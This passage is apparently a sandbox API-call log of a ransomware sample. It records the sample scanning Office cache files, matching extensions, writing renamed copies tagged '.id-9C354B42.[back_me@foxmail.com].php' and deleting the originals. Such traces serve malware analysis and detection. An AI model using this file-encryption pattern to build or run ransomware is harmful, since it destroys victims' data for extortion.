returned 1 [0035.255] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml")) returned 1 [0035.255] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 81 [0035.255] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 81 [0035.255] lstrlenW (lpString=".doc") returned 4 [0035.255] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.255] lstrlenW (lpString=".docx") returned 5 [0035.255] lstrcmpiW (lpString1=".docx", lpString2="f.xml") returned -1 [0035.255] lstrlenW (lpString=".pdf") returned 4 [0035.255] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.255] lstrlenW (lpString=".xls") returned 4 [0035.255] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.255] lstrlenW (lpString=".xlsx") returned 5 [0035.255] lstrcmpiW (lpString1=".xlsx", lpString2="f.xml") returned -1 [0035.255] lstrlenW (lpString=".ppt") returned 4 [0035.255] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.255] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 81 [0035.255] lstrlenW (lpString=".zip") returned 4 [0035.255] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.255] lstrlenW (lpString=".rar") returned 4 [0035.255] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.255] lstrlenW (lpString=".bz2") returned 4 [0035.255] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.255] lstrlenW (lpString=".7z") returned 3 [0035.255] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.255] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 81 [0035.255] lstrlenW (lpString=".dbf") returned 4 [0035.255] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.255] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 81 [0035.256] lstrlenW (lpString=".1cd") returned 4 [0035.256] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.256] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 81 [0035.256] lstrlenW (lpString=".jpg") returned 4 [0035.256] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.256] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 81 [0035.256] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 81 [0035.256] lstrlenW (lpString=".doc") returned 4 [0035.256] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.256] lstrlenW (lpString=".docx") returned 5 [0035.256] lstrcmpiW (lpString1=".docx", lpString2="f.xml") returned -1 [0035.256] lstrlenW (lpString=".pdf") returned 4 [0035.256] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.256] lstrlenW (lpString=".xls") returned 4 [0035.256] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.256] lstrlenW (lpString=".xlsx") returned 5 [0035.256] lstrcmpiW (lpString1=".xlsx", lpString2="f.xml") returned -1 [0035.256] lstrlenW (lpString=".ppt") returned 4 [0035.256] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.256] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 81 [0035.256] lstrlenW (lpString=".zip") returned 4 [0035.256] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.256] lstrlenW (lpString=".rar") returned 4 [0035.256] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.256] lstrlenW (lpString=".bz2") returned 4 [0035.256] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.256] lstrlenW (lpString=".7z") returned 3 [0035.256] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.256] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 81 [0035.256] lstrlenW (lpString=".dbf") returned 4 [0035.256] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.256] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 81 [0035.257] lstrlenW (lpString=".1cd") returned 4 [0035.257] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.257] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 81 [0035.257] lstrlenW (lpString=".jpg") returned 4 [0035.257] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.257] lstrcmpiW (lpString1=".xml", lpString2=".php") returned 1 [0035.257] lstrlenW (lpString="Setup.xml") returned 9 [0035.257] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0035.258] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=6241) returned 1 [0035.258] CloseHandle (hObject=0x1a4) returned 1 [0035.258] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0035.258] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0035.258] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0035.258] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.258] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.258] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac [0035.260] GetLastError () returned 0x0 [0035.260] ReadFile (in: hFile=0x1a4, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x1861, lpOverlapped=0x0) returned 1 [0035.261] WriteFile (in: hFile=0x1ac, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0x1870, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0x1870, lpOverlapped=0x0) returned 1 [0035.262] ReadFile (in: hFile=0x1a4, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x0, lpOverlapped=0x0) returned 1 [0035.262] WriteFile (in: hFile=0x1ac, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0035.263] SetEndOfFile (hFile=0x1ac) returned 1 [0035.263] CloseHandle (hObject=0x1ac) returned 1 [0035.263] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.263] SetEndOfFile (hFile=0x1a4) returned 1 [0035.264] CloseHandle (hObject=0x1a4) returned 1 [0035.264] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0035.264] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0035.265] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.265] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.265] lstrlenW (lpString=".doc") returned 4 [0035.265] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.265] lstrlenW (lpString=".docx") returned 5 [0035.265] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0035.265] lstrlenW (lpString=".pdf") returned 4 [0035.265] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.265] lstrlenW (lpString=".xls") returned 4 [0035.265] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.265] lstrlenW (lpString=".xlsx") returned 5 [0035.265] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0035.265] lstrlenW (lpString=".ppt") returned 4 [0035.265] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.265] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.265] lstrlenW (lpString=".zip") returned 4 [0035.265] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.265] lstrlenW (lpString=".rar") returned 4 [0035.265] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.265] lstrlenW (lpString=".bz2") returned 4 [0035.265] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.265] lstrlenW (lpString=".7z") returned 3 [0035.265] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.265] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.265] lstrlenW (lpString=".dbf") returned 4 [0035.265] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.265] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.265] lstrlenW (lpString=".1cd") returned 4 [0035.265] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.265] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.265] lstrlenW (lpString=".jpg") returned 4 [0035.266] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.266] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.266] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.266] lstrlenW (lpString=".doc") returned 4 [0035.266] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.266] lstrlenW (lpString=".docx") returned 5 [0035.266] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0035.266] lstrlenW (lpString=".pdf") returned 4 [0035.266] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.266] lstrlenW (lpString=".xls") returned 4 [0035.266] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.266] lstrlenW (lpString=".xlsx") returned 5 [0035.266] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0035.266] lstrlenW (lpString=".ppt") returned 4 [0035.266] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.266] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.266] lstrlenW (lpString=".zip") returned 4 [0035.266] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.266] lstrlenW (lpString=".rar") returned 4 [0035.266] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.266] lstrlenW (lpString=".bz2") returned 4 [0035.266] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.266] lstrlenW (lpString=".7z") returned 3 [0035.266] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.266] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.266] lstrlenW (lpString=".dbf") returned 4 [0035.266] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.266] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.266] lstrlenW (lpString=".1cd") returned 4 [0035.266] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.266] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.266] lstrlenW (lpString=".jpg") returned 4 [0035.267] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.267] lstrcmpiW (lpString1=".xml", lpString2=".php") returned 1 [0035.267] lstrlenW (lpString="VisioMUI.xml") returned 12 [0035.267] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0035.267] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=9503) returned 1 [0035.267] CloseHandle (hObject=0x1a4) returned 1 [0035.267] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml")) returned 0x2020 [0035.267] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0035.267] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0035.267] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.267] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.267] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac [0035.268] GetLastError () returned 0x0 [0035.268] ReadFile (in: hFile=0x1a4, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x251f, lpOverlapped=0x0) returned 1 [0035.269] WriteFile (in: hFile=0x1ac, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0x2520, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0x2520, lpOverlapped=0x0) returned 1 [0035.270] ReadFile (in: hFile=0x1a4, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x0, lpOverlapped=0x0) returned 1 [0035.270] WriteFile (in: hFile=0x1ac, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xec, lpOverlapped=0x0) returned 1 [0035.271] SetEndOfFile (hFile=0x1ac) returned 1 [0035.271] CloseHandle (hObject=0x1ac) returned 1 [0035.271] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.271] SetEndOfFile (hFile=0x1a4) returned 1 [0035.272] CloseHandle (hObject=0x1a4) returned 1 [0035.272] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0035.272] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml")) returned 1 [0035.273] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 75 [0035.273] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 75 [0035.273] lstrlenW (lpString=".doc") returned 4 [0035.273] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.273] lstrlenW (lpString=".docx") returned 5 [0035.273] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0035.273] lstrlenW (lpString=".pdf") returned 4 [0035.273] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.273] lstrlenW (lpString=".xls") returned 4 [0035.273] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.273] lstrlenW (lpString=".xlsx") returned 5 [0035.273] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0035.273] lstrlenW (lpString=".ppt") returned 4 [0035.273] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.273] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 75 [0035.273] lstrlenW (lpString=".zip") returned 4 [0035.273] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.273] lstrlenW (lpString=".rar") returned 4 [0035.273] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.273] lstrlenW (lpString=".bz2") returned 4 [0035.273] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.273] lstrlenW (lpString=".7z") returned 3 [0035.273] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.273] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 75 [0035.274] lstrlenW (lpString=".dbf") returned 4 [0035.274] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.274] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 75 [0035.274] lstrlenW (lpString=".1cd") returned 4 [0035.274] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.274] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 75 [0035.274] lstrlenW (lpString=".jpg") returned 4 [0035.274] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.274] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 75 [0035.274] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 75 [0035.274] lstrlenW (lpString=".doc") returned 4 [0035.274] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.274] lstrlenW (lpString=".docx") returned 5 [0035.274] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0035.274] lstrlenW (lpString=".pdf") returned 4 [0035.274] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.274] lstrlenW (lpString=".xls") returned 4 [0035.274] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.274] lstrlenW (lpString=".xlsx") returned 5 [0035.274] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0035.274] lstrlenW (lpString=".ppt") returned 4 [0035.274] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.274] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 75 [0035.274] lstrlenW (lpString=".zip") returned 4 [0035.274] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.274] lstrlenW (lpString=".rar") returned 4 [0035.274] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.274] lstrlenW (lpString=".bz2") returned 4 [0035.274] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.274] lstrlenW (lpString=".7z") returned 3 [0035.274] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.275] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 75 [0035.275] lstrlenW (lpString=".dbf") returned 4 [0035.275] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.275] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 75 [0035.275] lstrlenW (lpString=".1cd") returned 4 [0035.275] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.275] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 75 [0035.275] lstrlenW (lpString=".jpg") returned 4 [0035.275] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.275] lstrcmpiW (lpString1=".xml", lpString2=".php") returned 1 [0035.275] lstrlenW (lpString="OneNoteMUI.xml") returned 14 [0035.275] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0035.276] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=1606) returned 1 [0035.276] CloseHandle (hObject=0x1a4) returned 1 [0035.276] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml")) returned 0x2020 [0035.276] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0035.276] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0035.276] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.276] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.276] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac [0035.277] GetLastError () returned 0x0 [0035.277] ReadFile (in: hFile=0x1a4, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x646, lpOverlapped=0x0) returned 1 [0035.278] WriteFile (in: hFile=0x1ac, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0x650, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0x650, lpOverlapped=0x0) returned 1 [0035.279] ReadFile (in: hFile=0x1a4, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x0, lpOverlapped=0x0) returned 1 [0035.279] WriteFile (in: hFile=0x1ac, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xf0, lpOverlapped=0x0) returned 1 [0035.279] SetEndOfFile (hFile=0x1ac) returned 1 [0035.279] CloseHandle (hObject=0x1ac) returned 1 [0035.280] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, 